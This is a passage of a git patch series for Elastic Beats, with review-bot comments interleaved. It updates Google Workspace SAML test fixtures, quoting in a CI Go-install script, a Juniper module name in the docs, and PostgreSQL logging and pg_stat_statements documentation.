"google_workspace.saml.status_code": "SUCCESS_URI", "gsuite.actor.type": "USER", "gsuite.event.type": "login", "gsuite.kind": "admin#reports#activity", "gsuite.organization.domain": "elastic.com", - "gsuite.saml.application_name": "app", - "gsuite.saml.failure_type": "failure_app_not_configured_for_user", - "gsuite.saml.initiated_by": "idp", - "gsuite.saml.orgunit_path": "ounit", - "gsuite.saml.second_level_status_code": 400, - "gsuite.saml.status_code": 400, "input.type": "log", "log.offset": 0, "organization.id": "1", 
@@ -66,23 +66,23 @@ "event.dataset": "gsuite.saml", "event.id": "1", "event.module": "gsuite", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "success", "event.provider": "saml", "event.type": [ "start" ], "fileset.name": "saml", + "google_workspace.saml.application_name": "app", + "google_workspace.saml.initiated_by": "idp", + "google_workspace.saml.orgunit_path": "ounit", + "google_workspace.saml.status_code": "SUCCESS_URI", "gsuite.actor.type": "USER", "gsuite.event.type": "login", "gsuite.kind": "admin#reports#activity", "gsuite.organization.domain": "elastic.com", - "gsuite.saml.application_name": "app", - "gsuite.saml.initiated_by": "idp", - "gsuite.saml.orgunit_path": "ounit", - "gsuite.saml.status_code": 400, "input.type": "log", - "log.offset": 606, + "log.offset": 622, "organization.id": "1", "related.ip": [ "98.235.162.24" 
From 4ed2789184eafc95237e3cc0de7d038ba49d47d7 Mon Sep 17 00:00:00 2001 From: Victor Martinez Date: Mon, 29 Mar 2021 16:07:39 +0100 Subject: [PATCH 18/20] CI: install-go resilience (#24809) (#24813) --- .ci/scripts/install-go.sh | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.ci/scripts/install-go.sh b/.ci/scripts/install-go.sh index 23832e21cb40..8cb3f3e866e3 100755 --- a/.ci/scripts/install-go.sh +++ b/.ci/scripts/install-go.sh @@ -11,13 +11,15 @@ GVM_CMD="${HOME}/bin/gvm" if command -v go then + set +e echo "Found Go. Checking version.." FOUND_GO_VERSION=$(go version|awk '{print $3}'|sed s/go//) - if [ $FOUND_GO_VERSION == $GO_VERSION ] + if [ "$FOUND_GO_VERSION" == "$GO_VERSION" ] then echo "Versions match. No need to install Go. Exiting." exit 0 fi + set -e fi if [ "${ARCH}" == "aarch64" ] ; then From 75a7611d1ed876f525b1e7f064ee4b164ed12686 Mon Sep 17 00:00:00 2001 From: EamonnTP Date: Mon, 29 Mar 2021 17:31:41 +0100 Subject: [PATCH 19/20] Module sophosxg > junos (#24750) (#24819) * Module sophosxg > junos New to topic, but confused why the sophosxg module is referenced under the junos module. * Update source file Co-authored-by: Eamonn Smith Co-authored-by: Stef Nestor --- filebeat/docs/modules/juniper.asciidoc | 2 +- x-pack/filebeat/module/juniper/_meta/docs.asciidoc | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/filebeat/docs/modules/juniper.asciidoc b/filebeat/docs/modules/juniper.asciidoc index a2d2a0100d34..8b7b8d50ae1d 100644 --- a/filebeat/docs/modules/juniper.asciidoc +++ b/filebeat/docs/modules/juniper.asciidoc @@ -73,7 +73,7 @@ Versions above this are expected to work but have not been tested. [source,yaml] ---- -- module: sophosxg +- module: junos firewall: enabled: true var.input: udp diff --git a/x-pack/filebeat/module/juniper/_meta/docs.asciidoc b/x-pack/filebeat/module/juniper/_meta/docs.asciidoc index 3e145ea81c90..ca299f9302f1 100644 --- a/x-pack/filebeat/module/juniper/_meta/docs.asciidoc 
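Review bot: `set +e` covers more than it needs to: only the `go version|awk|sed` pipeline can fail here, yet errexit is also switched off for the echo, the test and the exit, and if the script did not already run under `set -e` the trailing `set -e` newly enables it for everything after the if block, which cannot be confirmed from the hunk. Capturing the failure on the one line that can produce it keeps the rest of the script's error handling as it was: `FOUND_GO_VERSION=$(go version 2>/dev/null | awk '{print $3}' | sed s/go// || true)`. The quoting added to both sides of the comparison is the right fix for the empty-variable case; `[ "$FOUND_GO_VERSION" = "$GO_VERSION" ]` would additionally be POSIX-portable should the script ever run under a shell other than bash.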
+++ b/x-pack/filebeat/module/juniper/_meta/docs.asciidoc @@ -68,7 +68,7 @@ Versions above this are expected to work but have not been tested. [source,yaml] ---- -- module: sophosxg +- module: junos firewall: enabled: true var.input: udp From 008715edfea0dc2962533ee8ee9d64715e0fb673 Mon Sep 17 00:00:00 2001 From: Jaime Soriano Pastor Date: Mon, 29 Mar 2021 20:59:29 +0200 Subject: [PATCH 20/20] Add docs in PostgreSQL modules about recommended configuration (#24588) (#24745) (cherry picked from commit 7f5a358cce09c050ead4d935905c1af515d00048) --- filebeat/docs/modules/postgresql.asciidoc | 102 +++++++++++++----- .../module/postgresql/_meta/docs.asciidoc | 102 +++++++++++++----- metricbeat/docs/modules/postgresql.asciidoc | 4 + metricbeat/metricbeat.reference.yml | 4 + .../postgresql/_meta/config.reference.yml | 4 + .../postgresql/statement/_meta/docs.asciidoc | 40 +++++++ x-pack/metricbeat/metricbeat.reference.yml | 4 + 7 files changed, 208 insertions(+), 52 deletions(-) diff --git a/filebeat/docs/modules/postgresql.asciidoc b/filebeat/docs/modules/postgresql.asciidoc index 695a30dffdd7..7483be9ac215 100644 --- a/filebeat/docs/modules/postgresql.asciidoc +++ b/filebeat/docs/modules/postgresql.asciidoc 
@@ -26,6 +26,80 @@ The +{modulename}+ module using `.log` was tested with logs from versions 9.5 on The +{modulename}+ module using `.csv` was tested using versions 11 and 13 (distro is not relevant here). +[float] +=== Supported log formats + +This module can collect any logs from PostgreSQL servers, but to be able to +better analyze their contents and extract more information, they should be +formatted in a determined way. + +There are some settings to take into account for the log format. + +Log lines should be preffixed with the timestamp in milliseconds, the process +id, the user id and the database name. This uses to be the default in most +distributions, and is translated to this setting in the configuration file: + +["source","sh"] +---------------------------- +log_line_prefix = '%m [%p] %q%u@%d ' +---------------------------- + +PostgreSQL server can be configured to log statements and their durations and +this module is able to collect this information. To be able to correlate each +duration with their statements, they must be logged in the same line. This +happens when the following options are used: + +["source","sh"] +---------------------------- +log_duration = 'on' +log_statement = 'none' +log_min_duration_statement = 0 +---------------------------- + +Setting a zero value in `log_min_duration_statement` will log all statements +executed by a client. You probably want to configure it to a higher value, so it +logs only slower statements. This value is configured in milliseconds. + +When using `log_statement` and `log_duration` together, statements and durations +are logged in different lines, and {beatname_uc} is not able to correlate both +values, for this reason it is recommended to disable `log_statement`. + +NOTE: The PostgreSQL module of Metricbeat is also able to collect information +about all statements executed in the server. You may chose which one is better +for your needings. 
An important difference is that the Metricbeat module +collects aggregated information when the statement is executed several times, +but cannot know when each statement was executed. This information can be +obtained from logs. + +Other logging options that you may consider to enable are the following ones: + +["source","sh"] +---------------------------- +log_checkpoints = 'on'; +log_connections = 'on'; +log_disconnections = 'on'; +log_lock_waits = 'on'; +---------------------------- + +Both `log_connections` and `log_disconnections` can cause a lot of events if you +don't have persistent connections, so enable with care. + +[float] +=== Using CSV logs + +Since the PostgreSQL CSV log file is a well-defined format, +there is almost no configuration to be done in {beatname_uc}, just the filepath. + +On the other hand, it's necessary to configure postgresql to emit `.csv` logs. +The recommended parameters are: + +["source","sh"] +---------------------------- +logging_collector = 'on'; +log_destination = 'csvlog'; +---------------------------- + + include::../include/configuring-intro.asciidoc[] The following example shows how to set paths in the +modules.d/{modulename}.yml+ 
@@ -69,38 +143,14 @@ The first dashboard is for regular logs. [role="screenshot"] image::./images/filebeat-postgresql-overview.png[] -The second one shows the slowlogs of PostgreSQL. +The second one shows the slowlogs of PostgreSQL. If `log_min_duration_statement` +is not used, this dashboard will show incomplete or no data. [role="screenshot"] image::./images/filebeat-postgresql-slowlog-overview.png[] :has-dashboards!: -=== Using CSV logs - -Since the PostgreSQL CSV log file is a well-defined format, -there is almost no configuration to be done in filebeat, just the filepath - -On the other hand, it's necessary to configure postgresql to emit `.csv` logs. -The recommended parameters are: - -``` -logging_collector = 'on'; -log_destination = 'csvlog'; -log_statement = 'none'; -log_checkpoints = on; -log_connections = on; -log_disconnections = on; -log_lock_waits = on; -log_min_duration_statement = 0; -``` - -In busy servers, `log_min_duration_statement` can cause contention, so you can assign -a value greater than 0. - -Both `log_connections` and `log_disconnections` can cause a lot of events if you don't have -persistent connections, so enable with care. - :fileset_ex!: :modulename!: diff --git a/filebeat/module/postgresql/_meta/docs.asciidoc b/filebeat/module/postgresql/_meta/docs.asciidoc index 840a15ccd823..1d27610bd8f0 100644 --- a/filebeat/module/postgresql/_meta/docs.asciidoc +++ b/filebeat/module/postgresql/_meta/docs.asciidoc 
@@ -21,6 +21,80 @@ The +{modulename}+ module using `.log` was tested with logs from versions 9.5 on The +{modulename}+ module using `.csv` was tested using versions 11 and 13 (distro is not relevant here). +[float] +=== Supported log formats + +This module can collect any logs from PostgreSQL servers, but to be able to +better analyze their contents and extract more information, they should be +formatted in a determined way. + +There are some settings to take into account for the log format. + +Log lines should be preffixed with the timestamp in milliseconds, the process +id, the user id and the database name. This uses to be the default in most +distributions, and is translated to this setting in the configuration file: + +["source","sh"] +---------------------------- +log_line_prefix = '%m [%p] %q%u@%d ' +---------------------------- + +PostgreSQL server can be configured to log statements and their durations and +this module is able to collect this information. To be able to correlate each +duration with their statements, they must be logged in the same line. This +happens when the following options are used: + +["source","sh"] +---------------------------- +log_duration = 'on' +log_statement = 'none' +log_min_duration_statement = 0 +---------------------------- + +Setting a zero value in `log_min_duration_statement` will log all statements +executed by a client. You probably want to configure it to a higher value, so it +logs only slower statements. This value is configured in milliseconds. + +When using `log_statement` and `log_duration` together, statements and durations +are logged in different lines, and {beatname_uc} is not able to correlate both +values, for this reason it is recommended to disable `log_statement`. + +NOTE: The PostgreSQL module of Metricbeat is also able to collect information +about all statements executed in the server. You may chose which one is better +for your needings. 
An important difference is that the Metricbeat module +collects aggregated information when the statement is executed several times, +but cannot know when each statement was executed. This information can be +obtained from logs. + +Other logging options that you may consider to enable are the following ones: + +["source","sh"] +---------------------------- +log_checkpoints = 'on'; +log_connections = 'on'; +log_disconnections = 'on'; +log_lock_waits = 'on'; +---------------------------- + +Both `log_connections` and `log_disconnections` can cause a lot of events if you +don't have persistent connections, so enable with care. + +[float] +=== Using CSV logs + +Since the PostgreSQL CSV log file is a well-defined format, +there is almost no configuration to be done in {beatname_uc}, just the filepath. + +On the other hand, it's necessary to configure postgresql to emit `.csv` logs. +The recommended parameters are: + +["source","sh"] +---------------------------- +logging_collector = 'on'; +log_destination = 'csvlog'; +---------------------------- + + include::../include/configuring-intro.asciidoc[] The following example shows how to set paths in the +modules.d/{modulename}.yml+ 
@@ -64,38 +138,14 @@ The first dashboard is for regular logs. [role="screenshot"] image::./images/filebeat-postgresql-overview.png[] -The second one shows the slowlogs of PostgreSQL. +The second one shows the slowlogs of PostgreSQL. If `log_min_duration_statement` +is not used, this dashboard will show incomplete or no data. [role="screenshot"] image::./images/filebeat-postgresql-slowlog-overview.png[] :has-dashboards!: -=== Using CSV logs - -Since the PostgreSQL CSV log file is a well-defined format, -there is almost no configuration to be done in filebeat, just the filepath - -On the other hand, it's necessary to configure postgresql to emit `.csv` logs. -The recommended parameters are: - -``` -logging_collector = 'on'; -log_destination = 'csvlog'; -log_statement = 'none'; -log_checkpoints = on; -log_connections = on; -log_disconnections = on; -log_lock_waits = on; -log_min_duration_statement = 0; -``` - -In busy servers, `log_min_duration_statement` can cause contention, so you can assign -a value greater than 0. - -Both `log_connections` and `log_disconnections` can cause a lot of events if you don't have -persistent connections, so enable with care. - :fileset_ex!: :modulename!: diff --git a/metricbeat/docs/modules/postgresql.asciidoc b/metricbeat/docs/modules/postgresql.asciidoc index 1958a3b314e3..795e7288310a 100644 --- a/metricbeat/docs/modules/postgresql.asciidoc +++ b/metricbeat/docs/modules/postgresql.asciidoc @@ -86,6 +86,10 @@ metricbeat.modules: # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/metricbeat/metricbeat.reference.yml b/metricbeat/metricbeat.reference.yml index e2ec23cfa741..731c0834f558 100644 --- a/metricbeat/metricbeat.reference.yml +++ b/metricbeat/metricbeat.reference.yml 
@@ -734,6 +734,10 @@ metricbeat.modules: # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/metricbeat/module/postgresql/_meta/config.reference.yml b/metricbeat/module/postgresql/_meta/config.reference.yml index f27874eee36a..3b4ed4579d11 100644 --- a/metricbeat/module/postgresql/_meta/config.reference.yml +++ b/metricbeat/module/postgresql/_meta/config.reference.yml @@ -10,6 +10,10 @@ # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/metricbeat/module/postgresql/statement/_meta/docs.asciidoc b/metricbeat/module/postgresql/statement/_meta/docs.asciidoc index 6c188dce2d99..20f295c11707 100644 --- a/metricbeat/module/postgresql/statement/_meta/docs.asciidoc +++ b/metricbeat/module/postgresql/statement/_meta/docs.asciidoc 
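Review bot: The added comment names the library as `pg_stats_statement`, but the library that the statement metricset docs in this same patch put into `shared_preload_libraries` is `pg_stat_statements`; a user copying the name from this comment into their PostgreSQL configuration would hit a failed server start. Suggest changing the two comment lines to `# Stats about every statement executed in the server. It requires the` / `# `pg_stat_statements` library to be configured in the server.`. The same wording is added in metricbeat/module/postgresql/_meta/config.reference.yml (the next hunk on this line), in x-pack/metricbeat/metricbeat.reference.yml below, and in metricbeat/docs/modules/postgresql.asciidoc above; the generated reference files presumably inherit it from the `_meta` config, so fixing it there should propagate on regeneration. It would also help to mention that the `pg_stat_statements` view exposes query text only to superusers or members of `pg_read_all_stats`, so the database user Metricbeat connects with needs that role rather than superuser privileges.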
@@ -1 +1,41 @@ This is the `statement` metricset of the PostgreSQL module. + +This module collects information from the `pg_stat_statements` view, that keeps +track of planning and execution statistics of all SQL statements executed by +the server. + +`pg_stat_statements` is included by an additional module in PostgreSQL. This +module requires additional shared memory, and is disabled by default. + +You can enable it by adding this module to the configuration as a shared +preloaded library. + +["source"] +------------------------------------------- +shared_preload_libraries = 'pg_stat_statements' +pg_stat_statements.max = 10000 +pg_stat_statements.track = all +------------------------------------------- + +NOTE: Preloading this library in your server will increase the memory usage of +your PostgreSQL server. Use it with care. + +Once the server is started with this module, it starts collecting statistics +about all statements executed. To make these statistics available in the +`pg_stat_statements` view, the following statement needs to be executed in the +server: + +["source","sql"] +------------------------------------------- +CREATE EXTENSION pg_stat_statements; +------------------------------------------- + +You can read more about the available options for this module in the +https://www.postgresql.org/docs/13/pgstatstatements.html[official documentation]. + +NOTE: The PostgreSQL module of Filebeat is also able to collect information +about statements executed in the server from its logs. You may chose which one +is better for your needings. An important difference is that the Metricbeat +module collects aggregated information when the statement is executed several +times, but cannot know when each statement was executed. This information can be +obtained from logs. diff --git a/x-pack/metricbeat/metricbeat.reference.yml b/x-pack/metricbeat/metricbeat.reference.yml index 58c6e9df7a59..1f57a9601558 100644 --- a/x-pack/metricbeat/metricbeat.reference.yml 
+++ b/x-pack/metricbeat/metricbeat.reference.yml @@ -1121,6 +1121,10 @@ metricbeat.modules: # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: